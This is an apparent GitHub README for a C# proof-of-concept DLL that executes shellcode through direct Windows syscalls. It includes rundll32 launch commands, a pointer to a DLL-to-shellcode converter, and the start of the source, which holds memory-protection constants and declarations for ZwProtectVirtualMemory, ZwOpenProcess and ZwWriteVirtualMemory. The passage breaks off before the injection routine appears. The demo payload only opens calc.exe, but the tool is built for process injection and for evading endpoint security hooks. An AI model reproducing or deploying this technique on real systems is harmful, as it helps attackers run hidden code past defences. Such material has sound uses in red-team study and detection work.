└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # ExecuteShellcodeWithSyscalls 2 | Execute shellcode with syscalls from a C# .dll 3 | 4 | Compile with csc.exe (https://github.com/mobdk/compilecs) and insert entrypoint exec. At the time of writing this supports Windows 10 1803/17134 1809/17763 1903/18362 1909/18363; servers can be added. 5 | 6 | For finding syscall identifiers go to https://j00ru.vexillium.org/syscalls/nt/64/ 7 | 8 | This PoC executes calc.exe. I recommend https://github.com/monoxgas/sRDI/blob/master/PowerShell/ConvertTo-Shellcode.ps1 for 9 | converting a C-coded .dll into shellcode; it works with both 32/64bit 10 | 11 | Execution example: 12 | 13 | Ordinal number: 14 | rundll32 syscalls.dll,#1 15 | 16 | Entrypoint exec: 17 | rundll32 syscalls.dll,exec 18 | 19 | syscalls.cs: 20 | 21 | ``` 22 | 23 | using System; 24 | using System.Security; 25 | using System.Diagnostics; 26 | using System.Runtime.InteropServices; 27 | using System.Runtime.ConstrainedExecution; 28 | using System.Management; 29 | using System.Security.Principal; 30 | using System.Collections.Generic; 31 | using System.ComponentModel; 32 | using System.Security.Permissions; 33 | using Microsoft.Win32.SafeHandles; 34 | using System.Linq; 35 | using System.Reflection; 36 | using System.Security.AccessControl; 37 | using System.Text; 38 | using System.Threading; 39 | 40 | 41 | 42 | 43 | public class Code 44 | { 45 | 46 | public const uint MEM_COMMIT = 0x00001000; 47 | public const uint MEM_RESERVE = 0x00002000; 48 | public const uint PAGE_EXECUTE_READWRITE = 0x40; 49 | public const int FILE_READ_DATA = 0x0001; 50 | public const int FILE_LIST_DIRECTORY = 0x0001; 51 | public const int FILE_WRITE_DATA = 0x0002; 52 | public const int FILE_ADD_FILE = 0x0002; 53 | public const int FILE_APPEND_DATA = 0x0004; 54 | public const int FILE_ADD_SUBDIRECTORY = 0x0004; 55 | public const int FILE_CREATE_PIPE_INSTANCE = 0x0004; 56 | public const int FILE_READ_EA 
= 0x0008; 57 | public const int FILE_WRITE_EA = 0x0010; 58 | public const int FILE_EXECUTE = 0x0020; 59 | public const int FILE_TRAVERSE = 0x0020; 60 | public const int FILE_DELETE_CHILD = 0x0040; 61 | public const int FILE_READ_ATTRIBUTES = 0x0080; 62 | public const int FILE_WRITE_ATTRIBUTES = 0x0100; 63 | public const int FILE_OVERWRITE_IF = 0x00000005; 64 | public const int FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020; 65 | public const long READ_CONTROL = 0x00020000; 66 | public const long SYNCHRONIZE = 0x00100000; 67 | public const long STANDARD_RIGHTS_WRITE = READ_CONTROL; 68 | public const long STANDARD_RIGHTS_EXECUTE = READ_CONTROL; 69 | public const long STANDARD_RIGHTS_ALL = 0x001F0000; 70 | public const long SPECIFIC_RIGHTS_ALL = 0x0000FFFF; 71 | public const long FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF; 72 | public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000; 73 | public const UInt32 STANDARD_RIGHTS_READ = 0x00020000; 74 | public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001; 75 | public const UInt32 TOKEN_DUPLICATE = 0x0002; 76 | public const UInt32 TOKEN_IMPERSONATE = 0x0004; 77 | public const UInt32 TOKEN_QUERY = 0x0008; 78 | public const UInt32 TOKEN_QUERY_SOURCE = 0x0010; 79 | public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020; 80 | public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040; 81 | public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080; 82 | public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100; 83 | public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY); 84 | public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID); 85 | public const UInt32 TOKEN_ALT = (TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY); 86 | public const UInt32 SE_PRIVILEGE_ENABLED = 0x2; 87 | public const long 
FILE_GENERIC_READ = STANDARD_RIGHTS_READ | FILE_READ_DATA | FILE_READ_ATTRIBUTES | FILE_READ_EA | SYNCHRONIZE; 88 | public const long FILE_GENERIC_WRITE = STANDARD_RIGHTS_WRITE | FILE_WRITE_DATA | FILE_WRITE_ATTRIBUTES | FILE_WRITE_EA | FILE_APPEND_DATA | SYNCHRONIZE; 89 | public const long FILE_GENERIC_EXECUTE = STANDARD_RIGHTS_EXECUTE | FILE_READ_ATTRIBUTES | FILE_EXECUTE | SYNCHRONIZE; 90 | public const int FILE_SHARE_READ = 0x00000001; 91 | public const int FILE_SHARE_WRITE = 0x00000002; 92 | public const int FILE_SHARE_DELETE = 0x00000004; 93 | public const int FILE_ATTRIBUTE_READONLY = 0x00000001; 94 | public const int FILE_ATTRIBUTE_HIDDEN = 0x00000002; 95 | public const int FILE_ATTRIBUTE_SYSTEM = 0x00000004; 96 | public const int FILE_ATTRIBUTE_DIRECTORY = 0x00000010; 97 | public const int FILE_ATTRIBUTE_ARCHIVE = 0x00000020; 98 | public const int FILE_ATTRIBUTE_DEVICE = 0x00000040; 99 | public const int FILE_ATTRIBUTE_NORMAL = 0x00000080; 100 | public const int FILE_ATTRIBUTE_TEMPORARY = 0x00000100; 101 | public const int FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200; 102 | public const int FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400; 103 | public const int FILE_ATTRIBUTE_COMPRESSED = 0x00000800; 104 | public const int FILE_ATTRIBUTE_OFFLINE = 0x00001000; 105 | public const int FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000; 106 | public const int FILE_ATTRIBUTE_ENCRYPTED = 0x00004000; 107 | public const int FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001; 108 | public const int FILE_NOTIFY_CHANGE_DIR_NAME = 0x00000002; 109 | public const int FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x00000004; 110 | public const int FILE_NOTIFY_CHANGE_SIZE = 0x00000008; 111 | public const int FILE_NOTIFY_CHANGE_LAST_WRITE = 0x00000010; 112 | public const int FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x00000020; 113 | public const int FILE_NOTIFY_CHANGE_CREATION = 0x00000040; 114 | public const int FILE_NOTIFY_CHANGE_SECURITY = 0x00000100; 115 | public const int FILE_ACTION_ADDED = 0x00000001; 116 | 
public const int FILE_ACTION_REMOVED = 0x00000002; 117 | public const int FILE_ACTION_MODIFIED = 0x00000003; 118 | public const int FILE_ACTION_RENAMED_OLD_NAME = 0x00000004; 119 | public const int FILE_ACTION_RENAMED_NEW_NAME = 0x00000005; 120 | public const int MAILSLOT_NO_MESSAGE = -1; 121 | public const int MAILSLOT_WAIT_FOREVER = -1; 122 | public const int FILE_CASE_SENSITIVE_SEARCH = 0x00000001; 123 | public const int FILE_CASE_PRESERVED_NAMES = 0x00000002; 124 | public const int FILE_UNICODE_ON_DISK = 0x00000004; 125 | public const int FILE_PERSISTENT_ACLS = 0x00000008; 126 | public const int FILE_FILE_COMPRESSION = 0x00000010; 127 | public const int FILE_VOLUME_QUOTAS = 0x00000020; 128 | public const int FILE_SUPPORTS_SPARSE_FILES = 0x00000040; 129 | public const int FILE_SUPPORTS_REPARSE_POINTS = 0x00000080; 130 | public const int FILE_SUPPORTS_REMOTE_STORAGE = 0x00000100; 131 | public const int FILE_VOLUME_IS_COMPRESSED = 0x00008000; 132 | public const int FILE_SUPPORTS_OBJECT_IDS = 0x00010000; 133 | public const int FILE_SUPPORTS_ENCRYPTION = 0x00020000; 134 | public const int FILE_NAMED_STREAMS = 0x00040000; 135 | public const int FILE_READ_ONLY_VOLUME = 0x00080000; 136 | public const int CREATE_ALWAYS = 2; 137 | public const uint GENERIC_ALL = 0x1FFFFF; 138 | const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007; 139 | const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000; 140 | const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; 141 | 142 | [StructLayout(LayoutKind.Sequential, Pack = 4)] 143 | public struct NtCreateThreadExBuffer 144 | { 145 | public int Size; 146 | public uint Unknown1; 147 | public uint Unknown2; 148 | public IntPtr Unknown3; 149 | public uint Unknown4; 150 | public uint Unknown5; 151 | public uint Unknown6; 152 | public IntPtr Unknown7; 153 | public uint Unknown8; 154 | }; 155 | 156 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 157 | public struct 
OSVERSIONINFOEXW 158 | { 159 | public int dwOSVersionInfoSize; 160 | public int dwMajorVersion; 161 | public int dwMinorVersion; 162 | public int dwBuildNumber; 163 | public int dwPlatformId; 164 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] 165 | public string szCSDVersion; 166 | public UInt16 wServicePackMajor; 167 | public UInt16 wServicePackMinor; 168 | public UInt16 wSuiteMask; 169 | public byte wProductType; 170 | public byte wReserved; 171 | } 172 | 173 | [StructLayout(LayoutKind.Sequential)] 174 | public struct LARGE_INTEGER 175 | { 176 | public UInt32 LowPart; 177 | public UInt32 HighPart; 178 | } 179 | 180 | [StructLayout(LayoutKind.Sequential)] 181 | public struct SYSTEM_INFO 182 | { 183 | public uint dwOem; 184 | public uint dwPageSize; 185 | public IntPtr lpMinAppAddress; 186 | public IntPtr lpMaxAppAddress; 187 | public IntPtr dwActiveProcMask; 188 | public uint dwNumProcs; 189 | public uint dwProcType; 190 | public uint dwAllocGranularity; 191 | public ushort wProcLevel; 192 | public ushort wProcRevision; 193 | } 194 | 195 | [Flags] 196 | public enum ProcessAccessFlags : uint 197 | { 198 | All = 0x001F0FFF, 199 | Terminate = 0x00000001, 200 | CreateThread = 0x00000002, 201 | VirtualMemoryOperation = 0x00000008, 202 | VirtualMemoryRead = 0x00000010, 203 | VirtualMemoryWrite = 0x00000020, 204 | DuplicateHandle = 0x00000040, 205 | CreateProcess = 0x000000080, 206 | SetQuota = 0x00000100, 207 | SetInformation = 0x00000200, 208 | QueryInformation = 0x00000400, 209 | QueryLimitedInformation = 0x00001000, 210 | Synchronize = 0x00100000 211 | } 212 | 213 | [StructLayout(LayoutKind.Sequential)] 214 | public struct OBJECT_ATTRIBUTES 215 | { 216 | public ulong Length; 217 | public IntPtr RootDirectory; 218 | public IntPtr ObjectName; 219 | public ulong Attributes; 220 | public IntPtr SecurityDescriptor; 221 | public IntPtr SecurityQualityOfService; 222 | } 223 | 224 | public struct CLIENT_ID 225 | { 226 | public IntPtr UniqueProcess; 227 | public 
IntPtr UniqueThread; 228 | } 229 | 230 | public enum NTSTATUS : uint 231 | { 232 | Success = 0x00000000, 233 | Wait0 = 0x00000000, 234 | Wait1 = 0x00000001, 235 | Wait2 = 0x00000002, 236 | Wait3 = 0x00000003, 237 | Wait63 = 0x0000003f, 238 | Abandoned = 0x00000080, 239 | AbandonedWait0 = 0x00000080, 240 | AbandonedWait1 = 0x00000081, 241 | AbandonedWait2 = 0x00000082, 242 | AbandonedWait3 = 0x00000083, 243 | AbandonedWait63 = 0x000000bf, 244 | UserApc = 0x000000c0, 245 | KernelApc = 0x00000100, 246 | Alerted = 0x00000101, 247 | Timeout = 0x00000102, 248 | Pending = 0x00000103, 249 | Reparse = 0x00000104, 250 | MoreEntries = 0x00000105, 251 | NotAllAssigned = 0x00000106, 252 | SomeNotMapped = 0x00000107, 253 | OpLockBreakInProgress = 0x00000108, 254 | VolumeMounted = 0x00000109, 255 | RxActCommitted = 0x0000010a, 256 | NotifyCleanup = 0x0000010b, 257 | NotifyEnumDir = 0x0000010c, 258 | NoQuotasForAccount = 0x0000010d, 259 | PrimaryTransportConnectFailed = 0x0000010e, 260 | PageFaultTransition = 0x00000110, 261 | PageFaultDemandZero = 0x00000111, 262 | PageFaultCopyOnWrite = 0x00000112, 263 | PageFaultGuardPage = 0x00000113, 264 | PageFaultPagingFile = 0x00000114, 265 | CrashDump = 0x00000116, 266 | ReparseObject = 0x00000118, 267 | NothingToTerminate = 0x00000122, 268 | ProcessNotInJob = 0x00000123, 269 | ProcessInJob = 0x00000124, 270 | ProcessCloned = 0x00000129, 271 | FileLockedWithOnlyReaders = 0x0000012a, 272 | FileLockedWithWriters = 0x0000012b, 273 | Informational = 0x40000000, 274 | ObjectNameExists = 0x40000000, 275 | ThreadWasSuspended = 0x40000001, 276 | WorkingSetLimitRange = 0x40000002, 277 | ImageNotAtBase = 0x40000003, 278 | RegistryRecovered = 0x40000009, 279 | Warning = 0x80000000, 280 | GuardPageViolation = 0x80000001, 281 | DatatypeMisalignment = 0x80000002, 282 | Breakpoint = 0x80000003, 283 | SingleStep = 0x80000004, 284 | BufferOverflow = 0x80000005, 285 | NoMoreFiles = 0x80000006, 286 | HandlesClosed = 0x8000000a, 287 | PartialCopy = 
0x8000000d, 288 | DeviceBusy = 0x80000011, 289 | InvalidEaName = 0x80000013, 290 | EaListInconsistent = 0x80000014, 291 | NoMoreEntries = 0x8000001a, 292 | LongJump = 0x80000026, 293 | DllMightBeInsecure = 0x8000002b, 294 | Error = 0xc0000000, 295 | Unsuccessful = 0xc0000001, 296 | NotImplemented = 0xc0000002, 297 | InvalidInfoClass = 0xc0000003, 298 | InfoLengthMismatch = 0xc0000004, 299 | AccessViolation = 0xc0000005, 300 | InPageError = 0xc0000006, 301 | PagefileQuota = 0xc0000007, 302 | InvalidHandle = 0xc0000008, 303 | BadInitialStack = 0xc0000009, 304 | BadInitialPc = 0xc000000a, 305 | InvalidCid = 0xc000000b, 306 | TimerNotCanceled = 0xc000000c, 307 | InvalidParameter = 0xc000000d, 308 | NoSuchDevice = 0xc000000e, 309 | NoSuchFile = 0xc000000f, 310 | InvalidDeviceRequest = 0xc0000010, 311 | EndOfFile = 0xc0000011, 312 | WrongVolume = 0xc0000012, 313 | NoMediaInDevice = 0xc0000013, 314 | NoMemory = 0xc0000017, 315 | ConflictingAddresses = 0xc0000018, 316 | NotMappedView = 0xc0000019, 317 | UnableToFreeVm = 0xc000001a, 318 | UnableToDeleteSection = 0xc000001b, 319 | IllegalInstruction = 0xc000001d, 320 | AlreadyCommitted = 0xc0000021, 321 | AccessDenied = 0xc0000022, 322 | BufferTooSmall = 0xc0000023, 323 | ObjectTypeMismatch = 0xc0000024, 324 | NonContinuableException = 0xc0000025, 325 | BadStack = 0xc0000028, 326 | NotLocked = 0xc000002a, 327 | NotCommitted = 0xc000002d, 328 | InvalidParameterMix = 0xc0000030, 329 | ObjectNameInvalid = 0xc0000033, 330 | ObjectNameNotFound = 0xc0000034, 331 | ObjectNameCollision = 0xc0000035, 332 | ObjectPathInvalid = 0xc0000039, 333 | ObjectPathNotFound = 0xc000003a, 334 | ObjectPathSyntaxBad = 0xc000003b, 335 | DataOverrun = 0xc000003c, 336 | DataLate = 0xc000003d, 337 | DataError = 0xc000003e, 338 | CrcError = 0xc000003f, 339 | SectionTooBig = 0xc0000040, 340 | PortConnectionRefused = 0xc0000041, 341 | InvalidPortHandle = 0xc0000042, 342 | SharingViolation = 0xc0000043, 343 | QuotaExceeded = 0xc0000044, 344 | 
InvalidPageProtection = 0xc0000045, 345 | MutantNotOwned = 0xc0000046, 346 | SemaphoreLimitExceeded = 0xc0000047, 347 | PortAlreadySet = 0xc0000048, 348 | SectionNotImage = 0xc0000049, 349 | SuspendCountExceeded = 0xc000004a, 350 | ThreadIsTerminating = 0xc000004b, 351 | BadWorkingSetLimit = 0xc000004c, 352 | IncompatibleFileMap = 0xc000004d, 353 | SectionProtection = 0xc000004e, 354 | EasNotSupported = 0xc000004f, 355 | EaTooLarge = 0xc0000050, 356 | NonExistentEaEntry = 0xc0000051, 357 | NoEasOnFile = 0xc0000052, 358 | EaCorruptError = 0xc0000053, 359 | FileLockConflict = 0xc0000054, 360 | LockNotGranted = 0xc0000055, 361 | DeletePending = 0xc0000056, 362 | CtlFileNotSupported = 0xc0000057, 363 | UnknownRevision = 0xc0000058, 364 | RevisionMismatch = 0xc0000059, 365 | InvalidOwner = 0xc000005a, 366 | InvalidPrimaryGroup = 0xc000005b, 367 | NoImpersonationToken = 0xc000005c, 368 | CantDisableMandatory = 0xc000005d, 369 | NoLogonServers = 0xc000005e, 370 | NoSuchLogonSession = 0xc000005f, 371 | NoSuchPrivilege = 0xc0000060, 372 | PrivilegeNotHeld = 0xc0000061, 373 | InvalidAccountName = 0xc0000062, 374 | UserExists = 0xc0000063, 375 | NoSuchUser = 0xc0000064, 376 | GroupExists = 0xc0000065, 377 | NoSuchGroup = 0xc0000066, 378 | MemberInGroup = 0xc0000067, 379 | MemberNotInGroup = 0xc0000068, 380 | LastAdmin = 0xc0000069, 381 | WrongPassword = 0xc000006a, 382 | IllFormedPassword = 0xc000006b, 383 | PasswordRestriction = 0xc000006c, 384 | LogonFailure = 0xc000006d, 385 | AccountRestriction = 0xc000006e, 386 | InvalidLogonHours = 0xc000006f, 387 | InvalidWorkstation = 0xc0000070, 388 | PasswordExpired = 0xc0000071, 389 | AccountDisabled = 0xc0000072, 390 | NoneMapped = 0xc0000073, 391 | TooManyLuidsRequested = 0xc0000074, 392 | LuidsExhausted = 0xc0000075, 393 | InvalidSubAuthority = 0xc0000076, 394 | InvalidAcl = 0xc0000077, 395 | InvalidSid = 0xc0000078, 396 | InvalidSecurityDescr = 0xc0000079, 397 | ProcedureNotFound = 0xc000007a, 398 | InvalidImageFormat = 
0xc000007b, 399 | NoToken = 0xc000007c, 400 | BadInheritanceAcl = 0xc000007d, 401 | RangeNotLocked = 0xc000007e, 402 | DiskFull = 0xc000007f, 403 | ServerDisabled = 0xc0000080, 404 | ServerNotDisabled = 0xc0000081, 405 | TooManyGuidsRequested = 0xc0000082, 406 | GuidsExhausted = 0xc0000083, 407 | InvalidIdAuthority = 0xc0000084, 408 | AgentsExhausted = 0xc0000085, 409 | InvalidVolumeLabel = 0xc0000086, 410 | SectionNotExtended = 0xc0000087, 411 | NotMappedData = 0xc0000088, 412 | ResourceDataNotFound = 0xc0000089, 413 | ResourceTypeNotFound = 0xc000008a, 414 | ResourceNameNotFound = 0xc000008b, 415 | ArrayBoundsExceeded = 0xc000008c, 416 | FloatDenormalOperand = 0xc000008d, 417 | FloatDivideByZero = 0xc000008e, 418 | FloatInexactResult = 0xc000008f, 419 | FloatInvalidOperation = 0xc0000090, 420 | FloatOverflow = 0xc0000091, 421 | FloatStackCheck = 0xc0000092, 422 | FloatUnderflow = 0xc0000093, 423 | IntegerDivideByZero = 0xc0000094, 424 | IntegerOverflow = 0xc0000095, 425 | PrivilegedInstruction = 0xc0000096, 426 | TooManyPagingFiles = 0xc0000097, 427 | FileInvalid = 0xc0000098, 428 | InstanceNotAvailable = 0xc00000ab, 429 | PipeNotAvailable = 0xc00000ac, 430 | InvalidPipeState = 0xc00000ad, 431 | PipeBusy = 0xc00000ae, 432 | IllegalFunction = 0xc00000af, 433 | PipeDisconnected = 0xc00000b0, 434 | PipeClosing = 0xc00000b1, 435 | PipeConnected = 0xc00000b2, 436 | PipeListening = 0xc00000b3, 437 | InvalidReadMode = 0xc00000b4, 438 | IoTimeout = 0xc00000b5, 439 | FileForcedClosed = 0xc00000b6, 440 | ProfilingNotStarted = 0xc00000b7, 441 | ProfilingNotStopped = 0xc00000b8, 442 | NotSameDevice = 0xc00000d4, 443 | FileRenamed = 0xc00000d5, 444 | CantWait = 0xc00000d8, 445 | PipeEmpty = 0xc00000d9, 446 | CantTerminateSelf = 0xc00000db, 447 | InternalError = 0xc00000e5, 448 | InvalidParameter1 = 0xc00000ef, 449 | InvalidParameter2 = 0xc00000f0, 450 | InvalidParameter3 = 0xc00000f1, 451 | InvalidParameter4 = 0xc00000f2, 452 | InvalidParameter5 = 0xc00000f3, 453 | 
InvalidParameter6 = 0xc00000f4, 454 | InvalidParameter7 = 0xc00000f5, 455 | InvalidParameter8 = 0xc00000f6, 456 | InvalidParameter9 = 0xc00000f7, 457 | InvalidParameter10 = 0xc00000f8, 458 | InvalidParameter11 = 0xc00000f9, 459 | InvalidParameter12 = 0xc00000fa, 460 | MappedFileSizeZero = 0xc000011e, 461 | TooManyOpenedFiles = 0xc000011f, 462 | Cancelled = 0xc0000120, 463 | CannotDelete = 0xc0000121, 464 | InvalidComputerName = 0xc0000122, 465 | FileDeleted = 0xc0000123, 466 | SpecialAccount = 0xc0000124, 467 | SpecialGroup = 0xc0000125, 468 | SpecialUser = 0xc0000126, 469 | MembersPrimaryGroup = 0xc0000127, 470 | FileClosed = 0xc0000128, 471 | TooManyThreads = 0xc0000129, 472 | ThreadNotInProcess = 0xc000012a, 473 | TokenAlreadyInUse = 0xc000012b, 474 | PagefileQuotaExceeded = 0xc000012c, 475 | CommitmentLimit = 0xc000012d, 476 | InvalidImageLeFormat = 0xc000012e, 477 | InvalidImageNotMz = 0xc000012f, 478 | InvalidImageProtect = 0xc0000130, 479 | InvalidImageWin16 = 0xc0000131, 480 | LogonServer = 0xc0000132, 481 | DifferenceAtDc = 0xc0000133, 482 | SynchronizationRequired = 0xc0000134, 483 | DllNotFound = 0xc0000135, 484 | IoPrivilegeFailed = 0xc0000137, 485 | OrdinalNotFound = 0xc0000138, 486 | EntryPointNotFound = 0xc0000139, 487 | ControlCExit = 0xc000013a, 488 | PortNotSet = 0xc0000353, 489 | DebuggerInactive = 0xc0000354, 490 | CallbackBypass = 0xc0000503, 491 | PortClosed = 0xc0000700, 492 | MessageLost = 0xc0000701, 493 | InvalidMessage = 0xc0000702, 494 | RequestCanceled = 0xc0000703, 495 | RecursiveDispatch = 0xc0000704, 496 | LpcReceiveBufferExpected = 0xc0000705, 497 | LpcInvalidConnectionUsage = 0xc0000706, 498 | LpcRequestsNotAllowed = 0xc0000707, 499 | ResourceInUse = 0xc0000708, 500 | ProcessIsProtected = 0xc0000712, 501 | VolumeDirty = 0xc0000806, 502 | FileCheckedOut = 0xc0000901, 503 | CheckOutRequired = 0xc0000902, 504 | BadFileType = 0xc0000903, 505 | FileTooLarge = 0xc0000904, 506 | FormsAuthRequired = 0xc0000905, 507 | VirusInfected = 
0xc0000906, 508 | VirusDeleted = 0xc0000907, 509 | TransactionalConflict = 0xc0190001, 510 | InvalidTransaction = 0xc0190002, 511 | TransactionNotActive = 0xc0190003, 512 | TmInitializationFailed = 0xc0190004, 513 | RmNotActive = 0xc0190005, 514 | RmMetadataCorrupt = 0xc0190006, 515 | TransactionNotJoined = 0xc0190007, 516 | DirectoryNotRm = 0xc0190008, 517 | CouldNotResizeLog = 0xc0190009, 518 | TransactionsUnsupportedRemote = 0xc019000a, 519 | LogResizeInvalidSize = 0xc019000b, 520 | RemoteFileVersionMismatch = 0xc019000c, 521 | CrmProtocolAlreadyExists = 0xc019000f, 522 | TransactionPropagationFailed = 0xc0190010, 523 | CrmProtocolNotFound = 0xc0190011, 524 | TransactionSuperiorExists = 0xc0190012, 525 | TransactionRequestNotValid = 0xc0190013, 526 | TransactionNotRequested = 0xc0190014, 527 | TransactionAlreadyAborted = 0xc0190015, 528 | TransactionAlreadyCommitted = 0xc0190016, 529 | TransactionInvalidMarshallBuffer = 0xc0190017, 530 | CurrentTransactionNotValid = 0xc0190018, 531 | LogGrowthFailed = 0xc0190019, 532 | ObjectNoLongerExists = 0xc0190021, 533 | StreamMiniversionNotFound = 0xc0190022, 534 | StreamMiniversionNotValid = 0xc0190023, 535 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 536 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 537 | CantCreateMoreStreamMiniversions = 0xc0190026, 538 | HandleNoLongerValid = 0xc0190028, 539 | NoTxfMetadata = 0xc0190029, 540 | LogCorruptionDetected = 0xc0190030, 541 | CantRecoverWithHandleOpen = 0xc0190031, 542 | RmDisconnected = 0xc0190032, 543 | EnlistmentNotSuperior = 0xc0190033, 544 | RecoveryNotNeeded = 0xc0190034, 545 | RmAlreadyStarted = 0xc0190035, 546 | FileIdentityNotPersistent = 0xc0190036, 547 | CantBreakTransactionalDependency = 0xc0190037, 548 | CantCrossRmBoundary = 0xc0190038, 549 | TxfDirNotEmpty = 0xc0190039, 550 | IndoubtTransactionsExist = 0xc019003a, 551 | TmVolatile = 0xc019003b, 552 | RollbackTimerExpired = 0xc019003c, 553 | TxfAttributeCorrupt = 0xc019003d, 554 | 
EfsNotAllowedInTransaction = 0xc019003e, 555 | TransactionalOpenNotAllowed = 0xc019003f, 556 | TransactedMappingUnsupportedRemote = 0xc0190040, 557 | TxfMetadataAlreadyPresent = 0xc0190041, 558 | TransactionScopeCallbacksNotSet = 0xc0190042, 559 | TransactionRequiredPromotion = 0xc0190043, 560 | CannotExecuteFileInTransaction = 0xc0190044, 561 | TransactionsNotFrozen = 0xc0190045, 562 | MaximumNtStatus = 0xffffffff 563 | }; 564 | 565 | [Flags] 566 | public enum MemoryProtection : uint 567 | { 568 | AccessDenied = 0x0, 569 | Execute = 0x10, 570 | ExecuteRead = 0x20, 571 | ExecuteReadWrite = 0x40, 572 | ExecuteWriteCopy = 0x80, 573 | Guard = 0x100, 574 | NoCache = 0x200, 575 | WriteCombine = 0x400, 576 | NoAccess = 0x01, 577 | ReadOnly = 0x02, 578 | ReadWrite = 0x04, 579 | WriteCopy = 0x08, 580 | //SEC_NO_CHANGE = 0x00400000 581 | } 582 | 583 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 584 | struct STARTUPINFO 585 | { 586 | public Int32 cb; 587 | public string lpReserved; 588 | public string lpDesktop; 589 | public string lpTitle; 590 | public Int32 dwX; 591 | public Int32 dwY; 592 | public Int32 dwXSize; 593 | public Int32 dwYSize; 594 | public Int32 dwXCountChars; 595 | public Int32 dwYCountChars; 596 | public Int32 dwFillAttribute; 597 | public Int32 dwFlags; 598 | public Int16 wShowWindow; 599 | public Int16 cbReserved2; 600 | public IntPtr lpReserved2; 601 | public IntPtr hStdInput; 602 | public IntPtr hStdOutput; 603 | public IntPtr hStdError; 604 | } 605 | 606 | [StructLayout(LayoutKind.Sequential)] 607 | internal struct PROCESS_INFORMATION 608 | { 609 | public IntPtr hProcess; 610 | public IntPtr hThread; 611 | public int dwProcessId; 612 | public int dwThreadId; 613 | } 614 | 615 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 616 | struct STARTUPINFOEX 617 | { 618 | public STARTUPINFO StartupInfo; 619 | public IntPtr lpAttributeList; 620 | } 621 | 622 | [DllImport("kernel32.dll", SetLastError = true)] 623 | 
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)] 624 | [SuppressUnmanagedCodeSecurity] 625 | [return: MarshalAs(UnmanagedType.Bool)] 626 | public static extern bool CloseHandle(IntPtr hObject); 627 | 628 | [DllImport("ntdll.dll", SetLastError = true)] 629 | public static extern bool ZwOpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle); 630 | 631 | [SuppressUnmanagedCodeSecurity] 632 | [DllImport("ntdll.dll", SetLastError = true)] 633 | private static extern NTSTATUS RtlGetVersion(ref OSVERSIONINFOEXW versionInfo); 634 | 635 | [DllImport("ntdll.dll")] 636 | public static extern NTSTATUS ZwProtectVirtualMemory( [In] IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, [In] MemoryProtection NewProtect, [Out] out MemoryProtection OldProtect ); 637 | 638 | [DllImport("kernel32.dll", SetLastError = true)] 639 | [return: MarshalAs(UnmanagedType.Bool)] 640 | private static extern bool InitializeProcThreadAttributeList( IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); 641 | 642 | [DllImport("kernel32.dll", SetLastError = true)] 643 | [return: MarshalAs(UnmanagedType.Bool)] 644 | private static extern bool UpdateProcThreadAttribute( IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); 645 | 646 | [SuppressUnmanagedCodeSecurity] 647 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 648 | public delegate NTSTATUS ZwOpenProcessX(out IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid); 649 | 650 | [SuppressUnmanagedCodeSecurity] 651 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 652 | public delegate NTSTATUS ZwWriteVirtualMemoryX(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten); 653 | 654 | [SuppressUnmanagedCodeSecurity] 655 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 656 | 
